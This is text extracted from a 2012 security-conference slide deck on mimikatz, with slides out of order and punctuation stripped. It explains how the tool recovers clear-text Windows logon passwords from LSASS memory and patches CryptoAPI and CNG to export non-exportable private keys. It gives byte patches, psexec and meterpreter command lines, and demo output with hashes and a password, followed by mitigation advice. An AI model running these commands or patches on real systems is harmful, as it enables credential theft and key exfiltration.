07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39
Constraint for most userUnavailable for computer keys
certutil -importpfx mycertp12 NoExportcertutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capihow it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquondash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellipndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40
mimikatz crypto capihow itrsquos exported ( level)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapibecause I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42
mimikatz cryptoexportCertificatesEmplacement CERT_SYSTEM_STORE_CURRENT_USERMy
- Benjamin DelpyContainer Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03Provider Microsoft Enhanced Cryptographic Provider v10Type AT_KEYEXCHANGEExportabiliteacute NONTaille cleacute 2048Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO
(0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacuteExport public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BEObjet CN=Benjamin Delpy C=FRIl ne sagit pas dun certificat racineHach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03Fournisseur = Microsoft Enhanced Cryptographic Provider v10
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de cryptageCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapibecause I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapidemo time
Import export import as not exportablehellip export
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44
mimikatz crypto patchcapilimitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life usebull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45
mimikatz crypto cnghow it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquondash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellipndash It is but itrsquos not perfecthellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46
mimikatz crypto cnghow itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz sekurlsa tspkgwhat is it
Microsoft introduces SSO capability for Terminal Server with NT 6 to improve RemoteApps and RemoteDestkop usersrsquosexperiencendash httptechnetmicrosoftcomlibrarycc772108aspx
Rely on CredSSP with Credentials Delegation (= Account delegation)ndash Specs httpdownloadmicrosoftcomdownload95e95ef66af-
9026-4bb0-a41d-a4f81802d92c5Bms-cssp5Dpdf
First impression it seems cool ndash User does not have to type its password
ndash Password is not in RDP file
ndash Password is not in user secrets
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 11
mimikatz sekurlsa tspkgquestions
KB says that for it works we must enable laquo Default credentials raquo delegationndash ldquoDefault credentials The credentials obtained when the user first logs on to
Windowsrdquo - httpsmsdnmicrosoftcomlibrarybb204773aspx
bull What Our UserDomainPassword | Hash | Ticket It seems hellipndash In all cases system seems to be vulnerable to pass-the-hellip
In what form Our specs [MS-CSSP]
ndash 22121 TSPasswordCredsbull The TSPasswordCreds structure contains the users password credentials that are delegated
to the server (or PIN) TSPasswordCreds = SEQUENCE
domainName [0] OCTET STRING userName [1] OCTET STRING password [2] OCTET STRING
ndash Challenge response for authentication bull Serveur YES (TLS Kerberos)bull Client NO password is sent to serverhellip
So password resides somewhere in memory
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 12
mimikatz sekurlsa tspkgsymbols amp theory
Letrsquos explore some symbols
ndash sounds coolhellip (thanks Microsoft)
Letrsquos imagine a scenariondash Enumerate all sessions to obtain
bull Username
bull Domain
bull LUID
ndash Call tspkgTSCredTableLocateDefaultCreds (rely on RtlLookupElementGenericTableAvl) with LUID to obtain
bull TS_CREDENTIAL
ndash Call tspkgTSObtainClearCreds (rely on LsaUnprotectMemory) with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for
bull TS_PRIMARY_CREDENTIAL with clear text credentialshellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 13
kdgt x tspkgclear75016d1c tspkgTSObtainClearCreds = ltno type informationgtkdgt x tspkgpassword75011b68 tspkgTSDuplicatePassword = ltno type informationgt75011cd4 tspkgTSHidePassword = ltno type informationgt750195ee tspkgTSRevealPassword = ltno type informationgt75012fbd tspkgTSUpdateCredentialsPassword = ltno type informationgtkdgt x tspkglocate7501158b tspkgTSCredTableLocateDefaultCreds = ltno type informationgt
mimikatz sekurlsa tspkgworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 14
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_TS_CREDENTIAL
KIWI_TS_PRIMARY_CREDENTIAL
typedef struct _KIWI_TS_PRIMARY_CREDENTIAL PVOID unk0LSA_UNICODE_STRING DomaineLSA_UNICODE_STRING UserNameLSA_UNICODE_STRING Password
KIWI_TS_PRIMARY_CREDENTIAL PKIWI_TS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
tspkgTSGlobalCredTable
typedef struct _KIWI_TS_CREDENTIAL ifdef _M_X64
BYTE unk0[108]elif defined _M_IX86
BYTE unk0[64]endif
LUID LocallyUniqueIdentifierPVOID unk1PVOID unk2PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary
KIWI_TS_CREDENTIAL PKIWI_TS_CREDENTIALKIWI_TS_CREDEN
TIAL
mimikatz sekurlsa tspkgdemo time
sekurlsatspkg
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 15
mimikatz sekurlsa wdigest
because clear text password over httphttps is not cool
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 16
mimikatz sekurlsa wdigestwhat is it
ldquoDigest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a users web browser It applies a hash function to a password before sending it over the network [hellip]rdquoWikipedia httpenwikipediaorgwikiDigest_access_authentication
ldquoCommon Digest Authentication Scenarios ndash Authenticated client access to a Web sitendash Authenticated client access using SASLndash Authenticated client access with integrity protection to a directory service
using LDAPrdquoMicrosoft httptechnetmicrosoftcomlibrarycc778868aspx
Again it seems cool ndash No password over the network just hashesndash No reversible password in Active Directory hashes for each realm
bull Only with Advanced Digest authentication
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 17
mimikatz sekurlsa wdigestwhat is it
We speak about hashes but what hashes H = MD5(HA1nonce[hellip]HA2)
bull HA1 = MD5(usernamerealmpassword)
bull HA2 = MD5(methoddigestURI[hellip])
Even after login HA1 may changehellip realm is from server side and cannot be determined before Windows logon
WDigest provider must have elements to compute responses for different servers ndash Username
ndash Realm (from server)
ndash Password
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 18
mimikatz sekurlsa wdigesttheory
This time we know ndash that WDigest keeps password in memory laquo by protocol raquo for HA1 digestndash that LSASS love to unprotect password with LsaUnprotectMemory (so protect
with LsaProtectMemory)
LsaUnprotectMemoryndash At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLEndash Letrsquos perform a research in WDigest
ndash Hypothesis seems verified
LsaProtectMemoryndash At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLEndash Letrsquos perform a research in WDigest
ndash SpAcceptCredentials takes clear password in argsbull Protect it with LsaProtectMemorybull Update or insert data in double linked list wdigestl_LogSessList
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 19
text7409D151 _DigestCalcHA18 call dword ptr [eax+0B4h]
text74096C69 _SpAcceptCredentials16 call dword ptr [eax+0B0h]
mimikatz sekurlsa wdigestworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 20
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
typedef struct _KIWI_WDIGEST_LIST_ENTRY struct _KIWI_WDIGEST_LIST_ENTRY Flinkstruct _KIWI_WDIGEST_LIST_ENTRY BlinkDWORD UsageCountstruct _KIWI_WDIGEST_LIST_ENTRY ThisLUID LocallyUniqueIdentifier[hellip]LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password[hellip]
KIWI_WDIGEST_LIST_ENTRY PKIWI_WDIGEST_LIST_ENTRY
wdigestl_LogSessList
search linked list for LUID
KIWI_WDIGEST_LIST_ENTRY
password in clear
mimikatz sekurlsa wdigestdemo time
sekurlsawdigest
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 21
mimikatz sekurlsa livessp
because Microsoft was too good in closed networks
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 22
mimikatz sekurlsa livessphow
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 23
0 kdgt process 0 0 lsassexePROCESS 83569040 SessionId 0 Cid 0224 Peb 7f43f000 ParentCid 01b4
DirBase 5df58100 ObjectTable 80ce4740 HandleCount ltData Not AccessiblegtImage lsassexe
0 kdgt process i 83569040You need to continue execution (press g ltentergt) for the contextto be switched When the debugger breaks in again you will be inthe new process context0 kdgt gBreak instruction exception - code 80000003 (first chance)ntRtlpBreakWithStatusInstruction814b39d0 cc int 30 kdgt reload userLoading User Symbols0 kdgt bp p $proc lsasrvLsaProtectMemory kc 5 g0 kdgt g
mimikatz sekurlsa livessphow
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 24
lsasrvLsaProtectMemorylivesspLiveMakeSupplementalCredlivesspLiveMakeSecPkgCredentialslivesspLsaApLogonUserEx2livesspSpiLogonUserEx2
lsasrvLsaProtectMemorymsv1_0NlpAddPrimaryCredentialmsv1_0SspAcceptCredentialsmsv1_0SpAcceptCredentials
lsasrvLsaProtectMemorytspkgTSHidePasswordtspkgSpAcceptCredentials
1 kdgt uf c livesspLsaApLogonUserEx2livesspLsaApLogonUserEx2 (74781536)[]livesspLsaApLogonUserEx2+0x560 (74781a96)call to livesspLiveCreateLogonSession (74784867)
Our LiveSSP provider
Yeah Pass the Hash capability with Live account toohellip
Live user can logon through RDP via SSO
mimikatz sekurlsa livesspworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 25
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_LIVESSP_LIST_ENTRY struct _KIWI_LIVESSP_LIST_ENTRY Flinkstruct _KIWI_LIVESSP_LIST_ENTRY BlinkPVOID unk0PVOID unk1PVOID unk2PVOID unk3DWORD unk4DWORD unk5PVOID unk6LUID LocallyUniqueIdentifierLSA_UNICODE_STRING UserNamePVOID unk7PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds
KIWI_LIVESSP_LIST_ENTRY PKIWI_LIVESSP_LIST_ENTRY
livesspLiveGlobalLogonSessionList
search linked list for LUID
KIWI_LIVESSP_LIST_ENTRYKIWI_LIVESSP_PRIMARY_CREDENTIAL
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL DWORD isSuppDWORD unk0LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_LIVESSP_PRIMARY_CREDENTIAL PKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa
Even if we already have tools for normal accounts are you not curious to test one with this trap
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 26
Me yes
mimikatz sekurlsa kerberos
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 27
lsasrvLsaProtectMemorykerberosKerbHideKeykerberosKerbCreatePrimaryCredentialskerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorykerberosKerbHidePasswordkerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorymsv1_0NlpAddPrimaryCredentialmsv1_0SspAcceptCredentialsmsv1_0SpAcceptCredentials
lsasrvLsaProtectMemorywdigestSpAcceptCredentials
lsasrvLsaProtectMemorytspkgTSHidePasswordtspkgSpAcceptCredentials
Kerberos part for password
Kerberos ticket part Maybe )
mimikatz sekurlsa kerberos (nt6)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL
DWORD unk0PVOID unk1PVOID unk2PVOID unk3
ifdef _M_X64BYTE unk4[32]
elif defined _M_IX86BYTE unk4[20]
endifLUID LocallyUniqueIdentifier
ifdef _M_X64BYTE unk5[44]
elif defined _M_IX86BYTE unk5[36]
endifLSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz sekurlsa kerberos (nt5)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flinkstruct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCountPVOID unk0PVOID unk1PVOID unk2DWORD unk3DWORD unk4PVOID unk5PVOID unk6PVOID unk7LUID LocallyUniqueIdentifier
ifdef _M_IX86DWORD unk8
endifDWORD unk9DWORD unk10PVOID unk11DWORD unk12DWORD unk13PVOID unk14PVOID unk15PVOID unk16[hellip]LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsademo time
Final sekurlsa demo sekurlsalogonPasswords full
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30
mimikatz sekurlsa kerberosldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31
mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32
LsaUnprotectMemory
mimikatz sekurlsaLsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKeyBYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsasrv
lsass
lsasrv
mimikatz
lsasrv
copyhellip
mimikatz sekurlsaLsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34
InitializationVector BYTE[16]
lsass
lsasrv
lsass
lsasrv
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD sizeDWORD tagDWORD typeDWORD unk0DWORD unk1DWORD unk2DWORD unk3PVOID unk4BYTE data etc
KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv typedef struct _KIWI_BCRYPT_KEY
DWORD sizeDWORD typePVOID unk0PKIWI_BCRYPT_KEY_DATA clePVOID unk1
KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsamemo
Security Packages
Protection Keys
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionListlsasrvLogonSessionListCount
LIST_ENTRYULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKeylsasrvg_pRandomKey
DESx lsasrvg_pDESXKeylsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsamemo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz
mimikatz privilegedebugDemande dACTIVATION du privilegravege SeDebugPrivilege OK
mimikatz sekurlsalogonPasswords full
Authentification Id 0234870Package dauthentification NTLMUtilisateur principal Gentil KiwiDomaine dauthentification vm-w8-rp-x
msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a
kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
livessp nt (LUID KO)
mimikatz sekurlsawhat we can do
Basicsndash No physical access to computer (first step to pass the hash then pass the pass)ndash No admin rights system rights debug privileges (hellip)ndash Disable local admin accountsndash Strong passwords (haha it was a joke so useless )ndash For privileged account network login instead of interactive (when possible)ndash Audit pass the hash keeps traces and can lock accountsndash No admin rights system rights debug privileges even VIPndash Use separated network (or forest) for privileged tasks
More in depthndash Force strong authentication (SmartCard amp Token) $ eurondash Short validity for Kerberos ticketsndash No delegationndash Disable NTLM (available with NT6)ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows)bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys ))ndash Let opportunities to stop retro compatibilityndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37
mimikatz cryptowhat is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeysbull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
